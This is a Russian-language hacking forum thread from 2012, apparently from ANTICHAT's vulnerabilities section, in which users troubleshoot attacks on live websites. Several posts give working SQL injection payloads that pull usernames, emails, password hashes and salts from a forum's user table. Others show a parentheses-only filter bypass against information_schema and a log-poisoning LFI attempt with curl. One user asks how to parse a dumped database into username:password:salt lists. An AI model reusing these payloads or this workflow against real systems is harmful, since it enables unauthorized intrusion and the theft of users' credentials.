HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19991  
Старый 13.03.2012, 12:57
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
как тут в конце заменить на скобки?
подкорректируй свой вопрос,а то не понятно и всмысле в конце скобки,поставь правильно вопрос
 
Ответить с цитированием

  #19992  
Старый 13.03.2012, 12:59
Zahar
Новичок
Регистрация: 17.03.2008
Сообщений: 5
Провел на форуме:
168509

Репутация: 1
По умолчанию

LFI

Камрады помогите советом.

Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом:

Код HTML:
HTML:
curl http://www.domain.org/nopages1.php --referer "http://go"
В логе режет конструкцию

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]
 
Ответить с цитированием

  #19993  
Старый 13.03.2012, 13:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Faaax, нужен запрос без плюсов, /**/ и остальных знаков, обойтись только скобками
 
Ответить с цитированием

  #19994  
Старый 13.03.2012, 13:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
23035

Репутация: 5
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
тогда нужно сделать так
&messagegroupid[0]=3) UNION
(
SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )
)
FROM user WHERE userid=1
Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.
 
Ответить с цитированием

  #19995  
Старый 13.03.2012, 13:22
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

DronS,

ты забыл комментарий после запроса:

Цитата:
Сообщение от None  
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
--+f
 
Ответить с цитированием

  #19996  
Старый 13.03.2012, 13:27
Unknown
Guest
Сообщений: n/a
Провел на форуме:
23035

Репутация: 5
По умолчанию

Ну можно и комментарий)
 
Ответить с цитированием

  #19997  
Старый 13.03.2012, 14:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Есть дамп БД, необходимо некоторые данные привести в другой вид.

Первоначально:

Цитата:
Сообщение от None  
`users` (`id`, `username`, `password`, `salt`, ....
Необходимо вырвать данные из определённых колонок, а именно: username:password:salt

Подскажите, чем лучше это сделать?

P.S. Вручную не предлагать.
 
Ответить с цитированием

  #19998  
Старый 13.03.2012, 14:25
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)

так тут у тебя ни одного пробела нету

gl0w,это не бред

если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
 
Ответить с цитированием

  #19999  
Старый 13.03.2012, 14:36
DronS
Guest
Сообщений: n/a
Провел на форуме:
2205

Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
Все правильно он подсказал. Ты ответ БД читал до конца?)

Код:
Code:
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1);
2gl0w спасибо, запрос корректен теперь

2Ereee с коментарием тоже нормуль идет
 
Ответить с цитированием

  #20000  
Старый 13.03.2012, 16:41
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Faaax =\

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)

так видно?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ